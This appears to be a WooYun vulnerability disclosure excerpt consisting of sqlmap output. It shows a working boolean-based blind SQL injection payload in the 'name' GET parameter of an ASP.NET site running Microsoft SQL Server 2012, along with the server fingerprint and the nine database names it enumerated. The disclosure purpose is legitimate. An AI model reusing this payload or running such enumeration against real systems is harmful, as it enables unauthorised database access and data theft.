WooYun.org

注入参数：
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: order=z_products&isget=all&name=NC%E4%BE%9B%E5%BA%94%E9%93%BE%E9%AB
%98%E7%BA%A7%E8%AE%A4%E8%AF%81%' AND 5431=5431 AND '%'='
[14:55:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[14:55:39] [INFO] fetching database names
[14:55:39] [INFO] the SQL query used returns 9 entries
[14:55:39] [INFO] resumed: 155_PX_New_yy
[14:55:39] [INFO] resumed: master
[14:55:39] [INFO] resumed: model
[14:55:39] [INFO] resumed: msdb
[14:55:39] [INFO] resumed: ReportServer
[14:55:39] [INFO] resumed: ReportServerTempDB
[14:55:39] [INFO] resumed: tempdb
[14:55:39] [INFO] resumed: Timber_PX_New_test
[14:55:39] [INFO] resumed: Timber_PX_New_yy
available databases [9]:
[*] 155_PX_New_yy
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Timber_PX_New_test
[*] Timber_PX_New_yy